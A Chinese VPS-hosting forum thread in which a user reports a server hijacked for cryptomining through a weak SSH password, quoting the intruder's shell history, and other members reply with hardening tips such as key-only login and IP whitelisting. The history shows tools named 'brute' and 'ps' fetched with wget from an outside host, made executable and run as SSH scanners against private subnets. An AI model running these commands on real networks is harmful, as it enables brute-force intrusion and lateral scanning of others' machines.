全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1472|回复: 8
打印 上一主题 下一主题

一不小心被挖矿了

[复制链接]
跳转到指定楼层
1#
发表于 2022-2-15 23:14:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 c菌 于 2022-2-15 23:16 编辑

防范意识薄弱,小鸡用的弱密码,没禁用密码登陆,今天登上机器看cpu100%,
马上意识到被挖矿了。看了下历史记录

  1. sudo -i
  2.   133  exit
  3.   134  nproc
  4.   135  lscpu
  5.   136  exit
  6.   137  nproc
  7.   138  exit
  8.   139  nproc
  9.   140  ls
  10.   141  ip r
  11.   142  exit
  12.   143  wget david1337.dev/brute
  13.   144  wget david1337.dev/banner
  14.   145  wget david1337.dev/ps
  15.   146  chmod +x *
  16.   147  ip r
  17.   148  ./ps 10.42 22
  18.   149  ./ps 192.168 22
  19.   150  ./ps 172.17 22
  20.   151  ls
  21.   152  exit
  22.   153  lscpu
  23.   154  ls
  24.   155  exit
  25.   156  top
  26.   157  exit
  27.   158  clear
  28.   159  ls
复制代码


淦塔皮燕纸 david1337.dev
2#
发表于 2022-2-15 23:16:16 | 只看该作者
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr
3#
 楼主| 发表于 2022-2-15 23:17:10 | 只看该作者
toot 发表于 2022-2-15 23:16
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr

不放心还是重装了
4#
发表于 2022-2-15 23:22:22 | 只看该作者
第一步不就是禁密码登录改成密钥么,
密钥还更方便
5#
发表于 2022-2-15 23:28:07 | 只看该作者
端口只对白名单ip开放,稳得一比,你密码设置123都没问题
6#
发表于 2022-2-15 23:28:48 | 只看该作者
这个矿工不专业,鞋套都不戴,差评
7#
发表于 2022-2-15 23:30:38 来自手机 | 只看该作者
密钥,其他都是默认,dmit什么的开机就是密钥,更规范
8#
发表于 2022-2-15 23:44:58 | 只看该作者
https://52.ht/thread-957070-1-1.html




* Linux常用命令:rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1'



* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc
   
9#
发表于 2022-2-15 23:59:40 来自手机 | 只看该作者
三个脚本被删除了。楼主有备份吗 发出来学习下
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-2-22 04:56 , Processed in 0.067696 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表